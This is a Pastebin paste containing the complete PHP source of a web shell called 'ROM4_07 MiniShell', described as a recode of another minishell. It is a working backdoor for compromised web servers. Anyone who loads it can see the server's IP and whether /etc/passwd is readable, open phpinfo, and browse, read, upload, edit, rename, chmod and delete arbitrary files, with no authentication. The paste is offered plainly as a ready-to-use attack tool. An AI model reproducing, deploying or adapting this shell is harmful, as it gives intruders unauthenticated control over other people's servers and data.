API tools faq
paste
RokiAdhytama

MiniShell ROM4_07 Recode From UnderTerror

RokiAdhytama
May 11th, 2019
104
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.95 KB | None | 0 0
raw download clone embed print report
  1. <h1><center>ROM4_07</center></h1>
  2. <table pd width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  3. <tr><td>
  4. <center>
  5. <?php
  6. $etc_passwd = @is_readable("/etc/passwd") ? "<b><span style=\"color:white\">ON </span></b>" : "<b><span style=\"color:red\"/>off </span></b>";
  7. echo '<b><font color=red>Server IP : </b></font><b>'.$_SERVER['SERVER_ADDR'].' </b>';
  8. echo '<b><font color=red>Your IP : </b></font><b>'.$_SERVER['REMOTE_ADDR'].'</b>';
  9. echo "</br>";
  10. echo "<b><font color=red>Safe Mode : </font></b>";
  11. // Check for safe mode
  12. if( ini_get('safe_mode') ) {
  13. print '<font color=#FF0000><b> ON</b></font>';
  14. } else {
  15. print '<font color=#008000><b> OFF</b></font>';
  16. }
  17. echo "</br>";
  18. echo "<b><font color=red>Read etc/passwd : </font></b><b>$etc_passwd</b>";
  19. echo "<b><font color=red>Functions : </font><b>";echo "<a href='$php_self?p=info'>PHP INFO </a>";
  20. if(@$_GET['p']=="info"){@phpinfo();
  21. exit;}
  22. ?>
  23. <br>
  24. </center>
  25. <?
  26.  
  27. set_time_limit(0);
  28. error_reporting(0);
  29.  
  30. if(get_magic_quotes_gpc()){
  31. foreach($_POST as $key=>$value){
  32. $_POST[$key] = stripslashes($value);
  33. }
  34. }
  35. echo '<!DOCTYPE HTML>
  36. <HTML>
  37. <HEAD>
  38. <link href="" rel="stylesheet" type="text/css">
  39. <title>ROM4_07 MiniShell</title>
  40. <style>
  41. body{
  42. font-family: "Arial", cursive;
  43. background-image:url("http://i68.tinypic.com/1124ebn.jpg");
  44. color:white;
  45. text-shadow:0px 0px 1px #757575;
  46. }
  47. #content tr:hover{
  48. background-color: #636263;
  49. text-shadow:0px 0px 10px #fff;
  50. }
  51. #content .first{
  52. background-color: silver;
  53. }
  54. #content .first:hover{
  55. background-color: gray;
  56. text-shadow:0px 0px 1px #757575;
  57. }
  58. table{
  59. border: 1px #33f702 dotted;
  60. }
  61. H1{
  62. font-family: "Arial", cursive;
  63. }
  64. a{
  65. color: #33f702;
  66. text-decoration: none;
  67. }
  68. a:hover{
  69. color: #fff;
  70. text-shadow:0px 0px 10px #ffffff;
  71. }
  72. input,select,textarea{
  73. border: 1px #999999 solid;
  74. -moz-border-radius: 5px;
  75. -webkit-border-radius:5px;
  76. border-radius:5px;
  77. }
  78. </style>
  79. </HEAD>
  80. <BODY>
  81.  
  82. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  83. <tr><td>
  84. <center>
  85. <font color=red><b>Current Path : </font></b>';
  86. if(isset($_GET['y'])){
  87. $path = $_GET['y'];
  88. }else{
  89. $path = getcwd();
  90. }
  91. $path = str_replace('\\','/',$path);
  92. $paths = explode('/',$path);
  93.  
  94. foreach($paths as $id=>$pat){
  95. if($pat == '' && $id == 0){
  96. $a = true;
  97. echo '<a href="?y=/">/</a>';
  98. continue;
  99. }
  100. if($pat == '') continue;
  101. echo '<a href="?y=';
  102. for($i=0;$i<=$id;$i++){
  103. echo $paths[$i];
  104. if($i != $id) echo "/";
  105. }
  106. echo '">'.$pat.'</a>/';
  107. }
  108. echo '<a href="?"><font color=red><b>&nbsp;&nbsp;&nbsp;Home </font></b></a></td></tr><tr><td>';
  109. if(isset($_FILES['file'])){
  110. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  111. echo '<font color="#30f209">File Upload Done.</font><br />';
  112. }else{
  113. echo '<font color="red">File Upload Error.</font><br />';
  114. }
  115. }
  116. echo '<center>';
  117. echo '<form enctype="multipart/form-data" method="POST">
  118. <b><font color=red>File Upload : </b></font><input type="file" name="file" />
  119. <input type="submit" value="upload" />
  120. </form>
  121. </td></tr>';
  122. if(isset($_GET['filesrc'])){
  123. echo "<tr><td><b><center><font color=red align=center>Current File :</font></b> ";
  124. echo '<a href="?filesrc='.$path/$file.'&y='.$path.'">'.$_GET[filesrc].'</a>';
  125. echo '</tr></td></table><br />';
  126. echo('<textarea cols=90 rows=20 name="src">'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  127. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  128. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  129. if($_POST['opt'] == 'chmod'){
  130. if(isset($_POST['perm'])){
  131. if(chmod($_POST['path'],$_POST['perm'])){
  132. echo '<font color="green">Change Permission Done.</font><br />';
  133. }else{
  134. echo '<font color="red">Change Permission Error.</font><br />';
  135. }
  136. }
  137. echo '<form method="POST">
  138. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  139. <input type="hidden" name="path" value="'.$_POST['path'].'">
  140. <input type="hidden" name="opt" value="chmod">
  141. <input type="submit" value="Go" />
  142. </form>';
  143. }elseif($_POST['opt'] == 'rename'){
  144. if(isset($_POST['newname'])){
  145. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  146. echo '<font color="green">Change Name Done.</font><br />';
  147. }else{
  148. echo '<font color="red">Change Name Error.</font><br />';
  149. }
  150. $_POST['name'] = $_POST['newname'];
  151. }
  152. echo '<form method="POST">
  153. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  154. <input type="hidden" name="path" value="'.$_POST['path'].'">
  155. <input type="hidden" name="opt" value="rename">
  156. <input type="submit" value="Go" />
  157. </form>';
  158. }elseif($_POST['opt'] == 'edit'){
  159. if(isset($_POST['src'])){
  160. $fp = fopen($_POST['path'],'w');
  161. if(fwrite($fp,$_POST['src'])){
  162. echo '<font color="green">Edit File Done.</font><br />';
  163. }else{
  164. echo '<font color="red">Edit File Error.</font><br />';
  165. }
  166. fclose($fp);
  167. }
  168. echo '<form method="POST">
  169. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  170. <input type="hidden" name="path" value="'.$_POST['path'].'">
  171. <input type="hidden" name="opt" value="edit">
  172. <input type="submit" value="Go" />
  173. </form>';
  174. }
  175. echo '</center>';
  176. }else{
  177. echo '</table><br /><center>';
  178. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  179. if($_POST['type'] == 'dir'){
  180. if(rmdir($_POST['path'])){
  181. echo '<font color="green">Delete Dir Done.</font><br />';
  182. }else{
  183. echo '<font color="red">Delete Dir Error.</font><br />';
  184. }
  185. }elseif($_POST['type'] == 'file'){
  186. if(unlink($_POST['path'])){
  187. echo '<font color="green">Delete File Done.</font><br />';
  188. }else{
  189. echo '<font color="red">Delete File Error.</font><br />';
  190. }
  191. }
  192. }
  193. echo '</center>';
  194. $scandir = scandir($path);
  195. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  196. <tr class="first">
  197. <td><center>Name</center></td>
  198. <td><center>Size</center></td>
  199. <td><center>Permissions</center></td>
  200. <td><center>Options</center></td>
  201. </tr>';
  202. foreach($scandir as $dir){
  203. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  204. echo "<tr>
  205. <td><a href=\"?y=$path/$dir\"><img width=33 height=44 src=\"http://icon-park.com/imagefiles/folder_icon_green.png\" />&nbsp;&nbsp;$dir</a></td>
  206. <td><center>--</center></td>
  207. <td><center>";
  208. if(is_writable("$path/$dir")) echo '<font color="#ffffff">';
  209. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  210. echo perms("$path/$dir");
  211. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  212.  
  213. echo "</center></td>
  214. <td><center><form method=\"POST\" action=\"?option&y=$path\">
  215. <select name=\"opt\">
  216. <option value=\"\"></option>
  217. <option value=\"delete\">Delete</option>
  218. <option value=\"chmod\">Chmod</option>
  219. <option value=\"rename\">Rename</option>
  220. </select>
  221. <input type=\"hidden\" name=\"type\" value=\"dir\">
  222. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  223. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  224. <input type=\"submit\" value=\">\" />
  225. </form></center></td>
  226. </tr>";
  227. }
  228. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  229. foreach($scandir as $file){
  230. if(!is_file("$path/$file")) continue;
  231. $size = filesize("$path/$file")/1024;
  232. $size = round($size,3);
  233. if($size >= 1024){
  234. $size = round($size/1024,2).' MB';
  235. }else{
  236. $size = $size.' KB';
  237. }
  238.  
  239. echo "<tr>
  240. <td><a href=\"?filesrc=$path/$file&y=$path\"><img width=33 height=44 src=\"http://icon-park.com/imagefiles/folder_icon_green.png\" />&nbsp;&nbsp;$file</a></td>
  241. <td><center>".$size."</center></td>
  242. <td><center>";
  243. if(is_writable("$path/$file")) echo '<font color="green">';
  244. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  245. echo perms("$path/$file");
  246. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  247. echo "</center></td>
  248. <td><center><form method=\"POST\" action=\"?option&y=$path\">
  249. <select name=\"opt\">
  250. <option value=\"\"></option>
  251. <option value=\"delete\">Delete</option>
  252. <option value=\"chmod\">Chmod</option>
  253. <option value=\"rename\">Rename</option>
  254. <option value=\"edit\">Edit</option>
  255. </select>
  256. <input type=\"hidden\" name=\"type\" value=\"file\">
  257. <input type=\"hidden\" name=\"name\" value=\"$file\">
  258. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  259. <input type=\"submit\" value=\">\" />
  260. </form></center></td>
  261. </tr>";
  262. }
  263. echo '</table>
  264. </div>';
  265. }
  266. echo '<br /><center>ROM4_07 MiniShell <br><font color="red">Recode From UnderTerror MiniShell</font></center>
  267. </BODY>
  268. </HTML>';
  269. function perms($file){
  270. $perms = fileperms($file);
  271.  
  272. if (($perms & 0xC000) == 0xC000) {
  273. // Socket
  274. $info = 's';
  275. } elseif (($perms & 0xA000) == 0xA000) {
  276. // Symbolic Link
  277. $info = 'l';
  278. } elseif (($perms & 0x8000) == 0x8000) {
  279. // Regular
  280. $info = '-';
  281. } elseif (($perms & 0x6000) == 0x6000) {
  282. // Block special
  283. $info = 'b';
  284. } elseif (($perms & 0x4000) == 0x4000) {
  285. // Directory
  286. $info = 'd';
  287. } elseif (($perms & 0x2000) == 0x2000) {
  288. // Character special
  289. $info = 'c';
  290. } elseif (($perms & 0x1000) == 0x1000) {
  291. // FIFO pipe
  292. $info = 'p';
  293. } else {
  294. // Unknown
  295. $info = 'u';
  296. }
  297.  
  298. // Owner
  299. $info .= (($perms & 0x0100) ? 'r' : '-');
  300. $info .= (($perms & 0x0080) ? 'w' : '-');
  301. $info .= (($perms & 0x0040) ?
  302. (($perms & 0x0800) ? 's' : 'x' ) :
  303. (($perms & 0x0800) ? 'S' : '-'));
  304.  
  305. // Group
  306. $info .= (($perms & 0x0020) ? 'r' : '-');
  307. $info .= (($perms & 0x0010) ? 'w' : '-');
  308. $info .= (($perms & 0x0008) ?
  309. (($perms & 0x0400) ? 's' : 'x' ) :
  310. (($perms & 0x0400) ? 'S' : '-'));
  311.  
  312. // World
  313. $info .= (($perms & 0x0004) ? 'r' : '-');
  314. $info .= (($perms & 0x0002) ? 'w' : '-');
  315. $info .= (($perms & 0x0001) ?
  316. (($perms & 0x0200) ? 't' : 'x' ) :
  317. (($perms & 0x0200) ? 'T' : '-'));
  318.  
  319. return $info;
  320. }
  321. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!